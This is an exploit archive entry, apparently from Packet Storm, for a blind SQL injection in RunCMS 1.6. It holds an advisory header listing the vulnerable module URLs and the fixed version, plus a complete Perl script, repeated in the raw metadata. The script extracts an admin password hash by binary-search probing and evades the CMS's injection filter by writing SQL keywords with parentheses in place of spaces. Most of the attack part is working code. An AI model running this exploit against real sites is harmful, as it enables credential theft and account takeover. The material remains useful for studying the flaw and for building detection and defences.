ID PACKETSTORM:62122
Type packetstorm
Reporter Sh2kerr
Modified 2007-12-28T00:00:00
Description
`#/******************************************************************/
#/****** RUNCMS 1.6 BLIND SQL Injection Exploit + IDS evasion *****/
#/******************************************************************/
#/*********** exploit gets hash of admin password *************/
#/*********** **************/
#/*********** Exploit is invisible for **************/
#/*********** RUNCMS sql injection detecting mechanism *************/
#/******************************************************************/
#/******************************************************************/
#/*********** tested on RUNCMS english version 1.6 *********/
#/******************************************************************/
#/******************************************************************/
#/* Date of Public EXPLOIT: December 25, 2007 */
#/* Written by: Alexandr "Sh2kerr" Polyakov */
#/* from [Digital Security Research Group] */
#/* research [at] dsec [dot] ru */
#/* */
#/* Original Advisory: http://www.securityfocus.com/archive/1/485512 */
#/******************************************************************/
#
#
#
#
# Details
#************************************************************************************
#
#
# Multiple Blind SQL Injection
#
# An attacker can inject SQL code through these modules:
#
# http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION
# http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION
#
# Example:
#
# This query will return link to download file:
# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0
#
#
# This query will return error:
# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0
#
#
#
# Fix Information
#*************************************************************************************
#
#RunCMS was altered to fix this flaw on Dec 15, 2007. Updated version (1.6.1) can be downloaded here:
# http://www.runcms.org/modules/mydownloads/visit.php?lid=131
#
#
#
# About
#*************************************************************************************
#
# Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration
# testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.
# Digital Security Research Group focuses on web application and database security problems with vulnerability reports,
# advisories and whitepapers posted regularly on our website.
#
#
# Contact: research [at] dsec [dot] ru
# http://www.dsec.ru (in Russian)
#
#
#
#
##############################################################################v
#!/usr/bin/perl
use LWP::UserAgent;
# Command-line setup.  Nothing below is declared with `my` and there is no
# `use strict`, so $path, $string, $user_id, $s_num, $n, $char and
# $allchar are all package globals that the subs further down read and
# write directly.
$path = $ARGV[0];                 # full target URL including the injectable query parameter (see usage)
$string = "this file must"; # !!CHEAT!! this string must be changed if the RunCMS language is not English
                                  # check() decides "condition true" by grepping the response body for $string
$user_id = $ARGV[1];              # uid whose `pass` column is read; interpolated verbatim into the SQL in check()
if (@ARGV < 2) { &usage; }        # usage() exits; the two assignments above have already run by then
$s_num =1;                        # 1-based character position handed to substring() in check()
$n=0;                             # request counter incremented in check(); never reported anywhere in this file
$|++;                             # autoflush STDOUT so the per-character ":) " progress shows immediately
print "\r\n\r\n";
print "****** RunCMS 1.6 Blind SQLInjection + IDS Evasion by Sh2kerr (DSecRG) ******\r\n";
print "*****************************************************************************\r\n";
# Main loop: recover one character per iteration.  found() narrows the
# ASCII range 48..122 ('0'..'z') by binary search and leaves the result in
# the global $char.  Every probe is one HTTP request, so a single character
# costs several round trips and a full run is a burst of near-identical
# requests to one endpoint -- the most reliable server-side signal of this
# tool (see the notes on check()).
while(1)
{
&found(48,122);
# `==` is a numeric compare, so this also matches the undef that crack()
# returns when no value in its window was confirmed; that is taken as
# "past the end of the value".  (Presumably ascii('') yields 0 on the
# target database -- not verifiable from this file.)
if ($char=="0")
{
print "\r\n\r\n";
print "*****************************************************************************\r\n";
print " Admin Password Hash: $allchar\r\n";
print "*****************************************************************************\r\n";
exit();
}
else
{ print ":) "; $allchar .= chr($char);   # progress marker, then append the recovered byte
}
$s_num++;                         # advance to the next character position
}
# Unreachable: the while(1) above only leaves via exit().
if ($char=="0")
{}
# Binary search for the ASCII value of the character at position $s_num.
#
# Narrows the window [$fmin, $fmax] by asking the server "is the byte
# greater than $r?" -- one HTTP request per step, via check().  Once the
# window is narrower than 5 values it hands off to crack() for a linear
# scan and stores the answer in the global $char, which is what the caller
# actually reads; the return value of the recursive branches is simply
# whatever the last evaluated expression was.
#
# $r and $check are not declared with `my`, so each recursion level
# overwrites the same globals; neither is read after the recursive call,
# so this is harmless but worth knowing when debugging.  The ($$)
# prototype is inert: every call site uses the &found(...) form, which
# bypasses prototype checking.
sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $char=&crack($fmin,$fmax); return $char }
$r = int($fmax - ($fmax-$fmin)/2);   # midpoint of the window (int() truncates)
$check = ">$r";
if ( &check($check) )
{ &found($r,$fmax); }       # byte > $r: keep the upper half ($r itself is a harmless extra candidate)
else { &found($fmin,$r+1); }   # byte <= $r: keep the lower half; the +1 compensates for crack() treating its upper bound as exclusive
}
# Linear scan over the small window [$cmin, $cmax): one request per
# candidate value, asking "is the byte equal to $i?".  Returns the first
# value the server confirms, or a bare `return` (undef in scalar context)
# when none matches -- the caller's numeric `== "0"` test treats that as
# end of data.  $i is a global (no `my`), like the other scratch variables
# in this file.
sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i;}
$i++;
}
return;
}
# Issue one probe request and report whether the injected condition held.
#
# $_[0] is a SQL comparison tail such as ">85" or "=97".  It is appended to
# an expression that evaluates ascii(substring(pass, $s_num, 1)) for the
# row with uid = $user_id, and the whole thing is appended to $path, i.e.
# it rides in the URL's query string (post() is called with the URL only,
# so the payload is not in the request body).  The response body is then
# searched for $string: present => 1 ("true"), absent => 0.
#
# Notes for anyone reading this from the detection side:
#  - The payload separates SQL keywords with parentheses instead of spaces
#    (SELECT(pass)FROM(runcms.runcms_users)); presumably this is the
#    "IDS evasion" the header refers to.  A signature that keys on
#    whitespace-separated keywords misses it; matching on the function
#    names (ascii, substring) or normalising punctuation before matching
#    does not.
#  - Every call builds a fresh LWP::UserAgent with no cookie jar, so each
#    probe is an independent request to the same URL.  $n counts them.
#  - $string is interpolated into the regex unescaped; any regex
#    metacharacters in it would change the match.
sub check($)
{
$n++;
$ccheck = $_[0];
$http_query = $path." AND ascii(substring((SELECT(pass)FROM(runcms.runcms_users)WHERE uid=".$user_id."),".$s_num.",1))".$ccheck;
$mcb_reguest = LWP::UserAgent->new() or die;
$res = $mcb_reguest->post($http_query);
@results = $res->content;   # content() returns one scalar, so this is a one-element list
foreach $result(@results)
{
if ($result =~ /$string/) { return 1; }
}
return 0;
}
# Print the command-line synopsis and exit.  Reached from the top of the
# script when fewer than two arguments are supplied.
sub usage
{
print "Usage: $0 [path_to_script?param] user_id \r\n";
print "e.g. : $0 http://[site]/modules/mydownloads/visit.php?lid=3 1";   # no trailing newline
exit();
}
`
{"hash": "e10ea0b1b87a97b77434b6120632840fe73dda4adcd586f6f1096fe3f588f2c6", "sourceHref": "https://packetstormsecurity.com/files/download/62122/runcms-sqlids.txt", "title": "runcms-sqlids.txt", "id": "PACKETSTORM:62122", "published": "2007-12-28T00:00:00", "description": "", "modified": "2007-12-28T00:00:00", "sourceData": "`#/******************************************************************/ \n#/****** RUNCMS 1.6 BLIND SQL Injection Exploit + IDS evasion *****/ \n#/******************************************************************/ \n#/*********** exploit get hash of admin password *************/ \n#/*********** **************/ \n#/*********** Exploit is invisible for **************/ \n#/*********** RUNCMS sql injection detecting mechanism *************/ \n#/******************************************************************/ \n#/******************************************************************/ \n#/*********** tested on RUNCMS english version 1.6 *********/ \n#/******************************************************************/ \n#/******************************************************************/ \n#/* Date of Public EXPLOIT: December 25, 2007 */ \n#/* Written by: Alexandr \"Sh2kerr\" Polyakov */ \n#/* from [Digital Security Research Group] */ \n#/* research [at] dsec [dot] ru */ \n#/* */ \n#/*Original Advisory: http://www.securityfocus.com/archive/1/485512*/ */ \n#/******************************************************************/ \n# \n# \n# \n# \n# Details \n#************************************************************************************ \n# \n# \n# Multiple Blind SQL Injection \n# \n# Attacker can inject SQL code in modules: \n# \n# http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION \n# http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION \n# http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION \n# 
http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION \n# http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION \n# http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION \n# \n# Example: \n# \n# This query will return link to download file: \n# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0 \n# \n# \n# This query will return error: \n# GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0 \n# \n# \n# \n# Fix Information \n#************************************************************************************* \n# \n#RunCMS was altered to fix this flaw on Dec 15, 2007. Updated version (1.6.1) can be downloaded here: \n# http://www.runcms.org/modules/mydownloads/visit.php?lid=131 \n# \n# \n# \n# About \n#************************************************************************************* \n# \n# Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration \n# testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. \n# Digital Security Research Group focuses on web application and database security problems with vulnerability reports, \n# advisories and whitepapers posted regularly on our website. \n# \n# \n# Contact: research [at] dsec [dot] ru \n# http://www.dsec.ru (in Russian) \n# \n# \n# \n# \n##############################################################################v \n \n \n \n \n \n \n \n#!/usr/bin/perl \n \n \nuse LWP::UserAgent; \n \n$path = $ARGV[0]; \n$string = \"this file must\"; # !!CHEAT!! 
this string must be changed ef Runsms language is not English \n$user_id = $ARGV[1]; \nif (@ARGV < 2) { &usage; } \n \n \n$s_num =1; \n$n=0; \n$|++; \nprint \"\\r\\n\\r\\n\"; \n \nprint \"****** RunCMS 1.6 Blind SQLInjection + IDS Evasion by Sh2kerr (DSecRG) ******\\r\\n\"; \nprint \"*****************************************************************************\\r\\n\"; \n \n \nwhile(1) \n{ \n&found(48,122); \n \nif ($char==\"0\") \n{ \n \n \nprint \"\\r\\n\\r\\n\"; \n \nprint \"*****************************************************************************\\r\\n\"; \nprint \" Admin Password Hash: $allchar\\r\\n\"; \nprint \"*****************************************************************************\\r\\n\"; \n \nexit(); \n} \nelse \n{ print \":) \"; $allchar .= chr($char); \n} \n \n$s_num++; \n} \n \nif ($char==\"0\") \n{} \n \n \n \n \n \nsub found($$) \n{ \nmy $fmin = $_[0]; \nmy $fmax = $_[1]; \n \n \nif (($fmax-$fmin)<5) { $char=&crack($fmin,$fmax); return $char } \n \n$r = int($fmax - ($fmax-$fmin)/2); \n$check = \">$r\"; \n \nif ( &check($check) ) \n{ &found($r,$fmax); } \nelse { &found($fmin,$r+1); } \n} \n \n \n \nsub crack($$) \n{ \nmy $cmin = $_[0]; \nmy $cmax = $_[1]; \n$i = $cmin; \n \nwhile ($i<$cmax) \n{ \n$crcheck = \"=$i\"; \nif ( &check($crcheck) ) { return $i;} \n$i++; \n} \nreturn; \n} \n \n \n \nsub check($) \n{ \n \n$n++; \n$ccheck = $_[0]; \n \n$http_query = $path.\" AND ascii(substring((SELECT(pass)FROM(runcms.runcms_users)WHERE uid=\".$user_id.\"),\".$s_num.\",1))\".$ccheck; \n \n \n$mcb_reguest = LWP::UserAgent->new() or die; \n$res = $mcb_reguest->post($http_query); \n \n@results = $res->content; \nforeach $result(@results) \n{ \nif ($result =~ /$string/) { return 1; } \n} \nreturn 0; \n} \n \nsub usage \n{ \nprint \"Usage: $0 [path_to_script?param] user_id \\r\\n\"; \nprint \"e.g. 
: $0 http://[site]/modules/mydownloads/visit.php?lid=3 1\"; \nexit(); \n} \n \n \n`\n", "reporter": "Sh2kerr", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "3529549fdcf80f5197dbb40dbffb7991"}, {"key": "modified", "hash": "9f06faad2c63af74ccb0af0790fe0e15"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "9f06faad2c63af74ccb0af0790fe0e15"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "cec8e5f15600cd27ab30729cf3a592b9"}, {"key": "sourceData", "hash": "990d2adbc3bf9226a3d10bfff124a0a5"}, {"key": "sourceHref", "hash": "9280e42be20e4f55b592334a7c01f4aa"}, {"key": "title", "hash": "e792244a52d82b968ba2d7507130be41"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/62122/runcms-sqlids.txt.html", "lastseen": "2016-11-03T10:16:41", "viewCount": 0, "enchantments": {"vulnersScore": 5.4}}
{"result": {}}